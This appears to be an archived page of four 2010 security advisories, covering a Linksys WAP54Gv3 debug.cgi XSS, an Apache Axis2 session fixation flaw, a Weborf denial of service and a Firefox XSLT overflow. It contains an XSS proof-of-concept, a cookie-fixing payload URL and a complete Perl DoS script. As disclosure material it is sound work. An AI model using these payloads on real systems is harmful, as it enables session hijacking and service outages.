IS-2010-003 - Linksys WAP54Gv3 debug.cgi Cross-Site Scripting

2010-06-23 Thread Cristofaro Mune
Security Advisory

IS-2010-003 - Linksys WAP54Gv3 debug.cgi Cross-Site Scripting



Advisory Information

Published (dd/mm/yy):
23/06/2010

Updated (dd/mm/yy):
23/06/2010

Manufacturer: Linksys
Model: WAP54G
Hardware version: v3.x
Firmware version: ver.3.05.03 (Europe)
  ver.3.04.03 (US)



Vulnerability Details
-
Class:
Cross-Site Scripting


Public References:
Not Assigned


Platform:
Successfully tested on Linksys WAP54Gv3 loaded with firmware version
Ver.3.05.03 (Europe)
Vulnerability present also on firmware ver.3.04.03 (US)
Other models and/or firmware versions may be also affected.


Background Information:
Linksys WAP54G is a wireless access points that allow wireless clients
connectivity to wired networks.
Supported 802.11b and 802.11g protocols, with data rates up to 54Mbit/s.


Summary:
A cross-site scripting vulnerability is present in the debug.cgi page,
that is accessible by using proper debug credentials


Details:
The debug.cgi page act as debug interface for the Linksys WAP54Gv3 and
is accessible by authenticating with proper debug credentials at the
following URL:

http://AP_IP_ADDR/debug.cgi

where AP_IP_ADDR is the IP address of the device.

Commands to be executed by the system are sent within the data1 POST
variable, while the command output is returned within a textarea tag
in the output html page.
Output is not sanitized in any way, allowing for a Cross-site scripting
condition that can be triggered by any command that includes a
/textarea closing tag in its output.
Additional text following such tag will be interpreted as regular HTML
by the accessing user browser, allowing for injection of Javascript
code, that will be run in the context of the presented web page.


Proof of Concept:
echo /textareascriptalert('XSS');/script


Impacts:
The vulnerability may allow an attacker to access the output of commands
during a Remote blind attack, where malicious web pages are used by
the attacker over the Internet to execute code on a victim access point
with private addressing, by leveraging an user browser as a 3rd party
reflector.
This would also allow an attacker to extract information and
configuration stored on devices that are not even able to access the
Internet (eg: firewall policy, gateway not configured)



Solutions  Workaround:
Not available



Additional Information
--
Timeline (dd/mm/yy):
09/11/2009: Requested Point of Contact to Linksys
10/11/2009: Received Point of Contact
10/11/2009: Vulnerability details sent
12/11/2009: Received clarification request on firmware version
12/11/2009: Additional details sent
16/01/2010: Requested update on vulnerability status.
--- No update received ---
23/06/2010: This advisory


Additional information available at http://www.icysilence.org





Apache Axis Session Fixation Vulnerability

2010-06-23 Thread Tiago Ferreira Barbosa
=[ Tempest Security Intelligence - Advisory #02 / 2010 ]===


Vulnerability  =  [  'Apache Axis Session Fixation Vulnerability' ]
  
Authors=  ['Tiago Ferreira tiago *SPAM* tempest.com.br'
   'Leandro Oliveira leandro *SPAM* tempest.com.br' ]


[ Table of Contents ]===

 1. Overview
 2. Detailed description
 3. Other contexts  Solutions
 4. Thanks
 5. References


[ Overview ]


 * System affected =  [ 'Apache Axis = 1.5' ] 
 * Release date:   =  [ '24 June 2010' ]
 * Impact =  [ 'Successful exploitation of this vulnerability 
may
lead to remote administrative interface to accept a Session Hijacking' ]

 

Axis2 [1] claims to be a Web Services / SOAP / WSDL engine, the
successor to the widely used Apache Axis SOAP stack. Nowadays, there are
two implementations of the Apache Axis2 Web services engine - Apache
Axis2/Java and Apache Axis2/C.

We have found a Session Fixation Vulnerability [2][3] in Apache Axis2.
When successfully exploited, this vulnerability allows to fixate a
Session Cookie in the browser of the victim, this way it's possible to
perform session hijacking attacks.

The chances of achieving success increases when the application is
vulnerable to Cross Site Scripting or HTTP Header Injection.


=[ Detailed description ]===

The vulnerability was found in the administrative interface of Axis2. By
default, it is accessible at the path /axis2/axis2-admin. To exploit
this flaw, we used a Cross Site Script in existing 
Axis2 (http://www.exploit-db.com/exploits/12721/).


Code Snippet:

http://example:8080/axis2/axis2-admin/engagingglobally?submit=%2bEngage
2bmodules=scriptdocument.cookie=JSESSIONID=C958373831119190D2DC7838BA177980.tomcat1;
 
Path=/axis2;document.location=http://example:8080/axis2/axis2-admin/;/script

The above code when run on the victim's browser, fixates the session
cookie sent by the attacker to it.


=[ Other contexts  Solutions ]=

As usual, we contacted the Apache Team [4]. Until this date there is no
known fix to solve this flaw.
  

[ Thanks ]=

- Tempest Security Intelligence [5] - Pentest Team
- Evandro Curvelo Hora  - evandro *SPAM* tempest.com.br
 

[ References ]=

 [1] http://ws.apache.org/axis2/
 [2] http://projects.webappsec.org/Session-Fixation
 [3]
http://www.owasp.org/index.php/Testing_for_Session_Fixation_(OWASP-SM-003)
 [4] https://issues.apache.org/jira/browse/AXIS2-4739
 [5] http://www.tempest.com.br





Weborf DCA-00012 Vulnerability Report

2010-06-23 Thread Crash
[DCA-0012]

[Software]
- Weborf HTTP Server

[Vendor Product Description]
- Weborf is a lightweight Web server written in C. It supports IPv6
and basic authentication. It doesn't implement the full HTTP
specification, but can be used to easily share directories or files.

[Bug Description]
- Weborf HTTP Server can't handle unicode characters in Connection: 
general header-field leading to a Denial-of-Service flaw

[History]
- Advisory sent to vendor on 06/21/2010.
- Vendor reply 06/22/2010.
- Vendor patch published 06/23/2010


[Impact]
- Low

[Affected Version]
-Weborf 0.12.1
- Prior versions may also be vulnerable.

[Exploit]

#!/usr/bin/perl
use IO::Socket;

if (@ARGV  1) {
usage();
}

$ip = $ARGV[0];
$port   = $ARGV[1];

print [+] Sending request...\n;

$socket = IO::Socket::INET-new( Proto = tcp, PeerAddr =
$ip, PeerPort = $port) || die [-] Connection FAILED!\n;
print $socket GET / HTTP/1.0\r\n;
print $socket Connection: . \0x99 x 4 .\r\n\r\n;

close($socket);

print [+] Done!\n;

sub usage() {
print [-] Usage: . $0 . host port\n;
print [-] Example: . $0 . 127.0.0.1 80\n;
exit;
}


DcLabs Security Group
Sponsor: ipax
i...@dclabs.com.br

[Credits]
Crash and all DcLabs members.


ZDI-10-113: Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability

2010-06-23 Thread ZDI Disclosures
ZDI-10-113: Mozilla Firefox XSLT Sort Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-113
June 23, 2010

-- CVE ID:
CVE-2010-1199

-- Affected Vendors:
Mozilla Firefox

-- Affected Products:
Mozilla Firefox 3.6.x

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 9910. 
For further product information on the TippingPoint IPS, visit:

http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Mozilla Firefox. User interaction is
required to exploit this vulnerability in that the target must visit a
malicious page or otherwise render a malicious file.

The specific flaw exists within a particular XSLT transformation when
applied to an XML document. If a large number of elements have this
transformation applied to them, the application will misallocate a
buffer. Upon usage of this buffer the application will copy more data
than allocated thus causing an overflow. This can lead to code execution
under the context of the application.

-- Vendor Response:
Mozilla Firefox has issued an update to correct this vulnerability. More
details can be found at:

http://www.mozilla.org/security/announce/2010/mfsa2010-30.html

-- Disclosure Timeline:
2010-03-22 - Vulnerability reported to vendor
2010-06-23 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
* Martin Barbella

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents 
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:

http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.

Our vulnerability disclosure policy is available online at:

http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:

http://twitter.com/thezdi